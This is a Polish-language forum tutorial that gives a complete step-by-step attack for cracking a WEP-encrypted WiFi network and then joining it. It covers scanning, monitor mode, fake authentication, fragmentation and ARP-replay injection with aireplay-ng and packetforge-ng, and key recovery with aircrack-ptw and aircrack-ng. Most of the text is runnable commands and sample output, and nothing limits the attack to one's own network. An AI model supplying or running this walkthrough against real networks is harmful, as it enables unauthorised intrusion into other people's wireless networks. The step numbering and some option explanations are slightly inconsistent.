Ataki na sieci WiFi nr 1 Streszczenie: 1. Zbieranie informacji potrzebnych do ataku. 2. Przygotowywanie karty w tryb monitor i odpowiedni kanal. 3. Przeprowadzamy atak Fake Authentication. 4. Przeprowadzamy atak Fragmentation. 5. Tworzymy pakiet ARP. 6. Uruchamiamy airodump-ng 7. Injectujemy pakiet ARP. 8. Uruchamiamy aircrack-ng lub aircrack-ptw. 9. Laczymy sie z siecia 1. Zbieranie informacji potrzebnych do ataku. Najbardziej fajnym sposobem ktorym znam jest uzycie iwlist. Ten program pokaze nam kanal, adres MAC Access Point'a, tryb, kanal, czy wlaczone jest szyfrowanie oraz jakosc sygnalu. W tym celu wpisujemy nastepujace polecenia: Kod ifconfig ra0 up Kod iwlist ra0 scan Naszym oczom ukazuje sie: Kod ra0 Scan completed : Cell 01 - Address: 00:14:BF:E1:D3:DD ESSID:"test" Mode:Managed Channel:11 Encryption key:on Quality:0/100 Signal level:-27 dBm Noise level:-256 dBm Teraz wiemy wystaczajaco duzo aby przystapic do punku 2. 2. Przygotowywanie karty w tryb monitor i odpowiedni kanal. Do trybu monitor mamy do wyboru uzyc airmon-ng lub iwconfig. Ja osobicie uzywam iwconfig lecz oba daja nam ten sam efekt. W przypadku airmong-ng bedzie to: Kod airmon-ng start ra0 11 Gdzie: start znaczy uruchom tryb monitor dla karty o interfejsie ra0 na kanale 11. System odpowie: Kod Interface Chipset Driver ra0 Ralink rt61 (monitor mode enabled) W przypadku iwconfig bedzie to: Kod iwconfig ra0 mode Monitor channel 11 Gdzie ra0 to interfejs mode to tryb Monitor na kanale 11-tym. 3. Przeprowadzamy atak Fake Authentication. Ukryty tekst Aby Access Point zaakceptowal pakiet ARP zrodlowy MAC musi byc polaczony z AP. W innym razie AP nie bedzie odpowiadal. W tym celu wpisujemy nastepujace polecenie: Kod aireplay-ng -1 0 -e test -a 00:14:BF:E1:D3:DD -h 00:17:9A:B2:31:AA ra0 Jesli system odpowie: Kod 13:57:55 Sending Authentication Request 13:37:55 Authentication successful 13:37:55 Sending Association Request 13:37:55 Association successful :-) Bingo! oto wlasnie chodzilo. Jesli otrzymalismy taki wynik przechodzimy do punku 4-go. Jesli dostajemy taka odpowiedz: Kod 13:59:50 Sending Authentication Request 13:59:52 Sending Authentication Request 13:59:54 Sending Authentication Request 13:59:56 Sending Authentication Request 13:59:58 Sending Authentication Request 14:00:00 Sending Authentication Request 14:00:02 Sending Authentication Request Attack was unsuccessful. Possible reasons: * Perhaps MAC address filtering is enabled. * Check that the BSSID (-a option) is correct. * Try to change the number of packets (-o option). * The driver hasn't been patched for injection. * This attack sometimes fails against some APs. * The card is not on the same channel as the AP. * Injection is not supported AT ALL on HermesI, Centrino, ndiswrapper and a few others chipsets. * You're too far from the AP. Get closer, or lower the transmit rate (iwconfig <iface> rate 1M). Jest to nieudany atak. Upewnij sie ze atak jest wystarczajaco mocny i zmien rate trasmitowania karty poleceniem: Kod iwconfig ra0 rate 1M I wykonaj atak ponownie. 4. Przeprowadzamy atak Fragmentation. Abysmy mogli przystapic do tego ataku atak nr. 3 MUSI sie udac. Atak Fragmentation nie tworzy nam pakietu ARP lecz uzywamy ten atak aby w nastepnym ataku bylo to mozliwe. Wklepujemy nastepujace polecenie: Kod aireplay-ng -5 -b 00:14:BF:E1:D3:DD -h 00:17:9A:B2:31:AA ra0 Gdzie opcja -5 to fragmentation attack, -b to mac Access Point'a, -h to nasz adres MAC, ra0 to interfejs karty. Po kilku sekundach system odpowie: Kod Waiting for a data packet... Read 337 packets... Size: 344, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:14:BF:E1:D3:DD Dest. MAC = 01:00:5E:7F:FF:FA Source MAC = 00:14:BF:E1:D3:DB 0x0000: 0862 0000 0100 5e7f fffa 0014 bfe1 d3dd .b....^........ 0x0010: 0014 bfe1 d3db 5044 058b 9500 4b85 b8e6 ......PD....K... 0x0020: 366d 66c7 3480 33a3 bccc 84ea 59a5 9ceb 6mf.4.3.....Y... 0x0030: 70f0 f095 4834 0821 18a8 d626 3038 6955 p...H4.!...&08iU 0x0040: 28fb 6fc6 d1ba 69bb aaf0 bc4d 5fda 8e48 (.o...i....M_..H 0x0050: 58c4 ab90 01f0 4bd8 d7b3 6ea2 495b 5b36 X.....K...n.I[[6 0x0060: 6f45 dab2 f9b4 4831 8e00 98b8 365e afd7 oE....H1....6^.. 0x0070: 1284 fa9e 5740 3750 6662 c9d9 d9d7 a8d1 ....W@7Pfb...... 0x0080: 0789 8d50 6473 566f 9a8f eeb6 7161 581e ...PdsVo....qaX. 0x0090: 1136 306b 5c02 b838 b119 3c48 9c8c 0fa6 .60k\..8..<H.... 0x00a0: 7fb0 9724 f1f7 94e1 63a6 3447 29a5 1f07 ..$....c.4G)... 0x00b0: 6f36 fdf1 e860 2459 3bdb 3748 4396 e8ab o6...`$Y;.7HC... 0x00c0: 673c cd84 2b64 2233 2bbf 47df 3d1b b863 g<..+d"3+.G.=..c 0x00d0: 564c efd2 0e8e 97bf c68b d461 1c14 a288 VL.........a.... --- CUT --- Use this packet ? Stanowczo odpowiadamy Y. Nastepnie system nam odpowie: Kod Saving chosen packet in replay_src-0427-141120.cap Data packet found! Sending fragmented packet Got RELAYED packet!! Thats our ARP packet! Trying to get 384 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Trying to get 1500 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Saving keystream in fragment-0427-141145.xor Now you can build a packet with packetforge-ng out of that 1500 bytes keystream Yeah! Przechodzimy do nastepnego punku. 5. Tworzymy pakiet ARP. Bez zbednego bla bla bla wpisujemy polecenie: Kod packetforge-ng -0 -a 00:14:BF:E1:D3:DD -h 00:17:9A:B2:31:AA -k 255.255.255.255 -l 255.255.255.255 -y fragment-0427-141145.xor -w sexowny-pakiet-arp Gdzie -0 mowimy programowi ze chcemy pakiet ARP, -a to MAC Access Point'a, -h to nasz adres MAC, -l to zrodlo, -k to cel, -y to plik ktory zostal wygenerowany w poprzednim ataku, -w to nazwa pliku w ktory program ma zapisac nasz pakiet ARP. Z doswiadczenia wiem ze te ustawiania dzialaja zawsze. System odpowie: Kod Wrote packet to: sexowny-pakiet-arp Brawo, wlasnie stworzylismy pakiet ARP i przestepujemy do nastepnego punktu. 6. Uruchamiamy airodump-ng Uruchamiamy konsole i wpisujemy nastepujace polecenie: Kod airodump-ng -w tocrack -c 11 --bssid 00:14:BF:E1:D3:DD ra0 aireplay-ng -2 -r sexowny-pakiet-arp -x 666 ra0 Gdzie -2 to injectowanie indywidualnie wybranego pakietu -r sexowny-pakiet-arp to nazwa nasz pakiet ARP, -x 666 to ilosc pakietow ktore zostana wyslane (w sekundach). System odpowie: Kod Size: 68, FromDS: 0, ToDS: 1 (WEP) BSSID = 00:14:BF:E1:D3:DD Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:17:9A:B2:31:AA 0x0000: 0841 0201 0014 bfe1 d3dd 0017 9ab2 31aa .A............1. 0x0010: ffff ffff ffff 8001 128b 9500 0d51 313f .............Q1? 0x0020: bc5f fa9c d755 50ab 5246 1e83 9172 f4b1 ._...UP.RF...r.. 0x0030: 3522 dd56 6e5f 90a9 9275 fe6c 5d84 dcea 5".Vn_...u.l]... 0x0040: 402e e7fa @... Use this packet ? Jak widac wielkosc naszego pakietu to 68 bitow jest to tradycyjna wielkosc pakietu ARP, BSSID to adres MAC Acess Point'a, Dest. MAC to adres docelowy jak widac jest to adres MAC broadcast'u (255.255.255.255), Source MAC to zrodlo czyli my ;). Stanowczo odpowiadamy Y nastepnie program zacznie wysylac pakiet a airodump-ng "zlapie" odpowiedzi ktore wysle nam Acess Point. Przechodzimy do nastepnego punktu. 8. Uruchamiamy aircrack-ng lub aircrack-ptw. W dawnej wersji WEP klucze mialy 64 bity dzis WEP2 ma 128 a tak naprawde jest to 104 bity. Program aircrack-ptw jest nowoscia musimy go samodzielnie zainstalowac samodzielnie. Mozemy go pobrac ze strony [ www ] Przystepujemy do instalacji. Pierw musimy go rozpakowac poleceniem: Kod tar -zxvf aircrack-ptw-1.0.0.tar.gz Nastepnie: Kod cd aircrack-ptw-1.0.0 && make emerge aircrack-ptw Dla tych co uzywaja aircrack-ng musza zaczekac znacznie wiecej aby zlamac klucz dla tych co uzywaja aircrack-ptw caly proces w bardzo krotszy. Pierw opisze uzycie programu aircrack-ptw: Kod aircrack-ptw tocrack-01.cap Gdzie tocrack-01.cap to jest nazwa pliku ktora stworzyl nam program airodump-ng. Jesli mamy wystarczajaco pakietow program zlamie klucz odpowiadajac: Kod This is aircrack-ptw 1.0.0 For more informations see http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/ allocating a new table bssid = 00:14:BF:E1:D3:DD keyindex=0 stats for bssid 00:14:BF:E1:D3:DD keyindex=0 packets=115771 Found key with len 13: 35 80 8D 60 FA 9D 08 7D F7 65 DA 1D 70 Bingo, zlamalismy klucz. Dla tych co uzywaja aircrack-ng musza zebrac 250.000 pakietow IV aby zlamac 64 bitowy klucz oraz milion czasami wiecej aby zlamac 128 bitowy klucz. W tym celu wpisujemy: Kod aircrack-ng -0 tocrack-01.cap Dzieki opcji -X bedziemy mieli kolorki jak w matrixie, tocrack-01.cap to nazwa pliku z pakietami. Jesli wszystko pujdzie OK program zlamie klucz i wyswietli go nam na ekranie krzyczac: Kod KEY FOUND! [ 35 80 8D 60 FA 9D 08 7D F7 65 DA 1D ] Jesli wydobycie klucza sie nie zakonczy jakbysmy tego chcieli mozemy dodac parametrk -f x. Gdzie x jest liczba: Kod aircrack-ng -X -f 15 tocrack-01.cap Z doswiadczenia wiem ze 15 jest najlepszym wyjsciem. Ale nie jest to regula. Nastepnie... 9. Laczymy sie z siecia Po zlamaniu klucza kazdy bedzie chcial polaczyc sie z siecia. Aby to zrobic musimy: Wylaczyc karte: Kod ifconfig ra0 down Nastepnie ustawic nazwe sieci, ustawic tryb, podac klucz oraz kanal poleceniem: Kod iwconfig ra0 mode Managed key 35 80 8D 60 FA 9D 08 7D F7 65 DA 1D essid test channel 11 Teraz mozemy uzyc dhcpcd lub pump. Dla dhcpcd bedzie to: Kod dhcpcd ra0 Dla pump bedzie to: Kod pump -i ra0 Chyba nie musze tlumaczyc co jest do czego. Jesli system nie odpowie nam zadnym komunikatem bledu znaczy ze wszystko jest OK i mozemy przetestowac polaczenie: Kod ping -c 3 www.google.com System odpowie: Kod PING www.l.google.com (64.233.183.147) 56(84) bytes of data. 64 bytes from nf-in...
Kapy97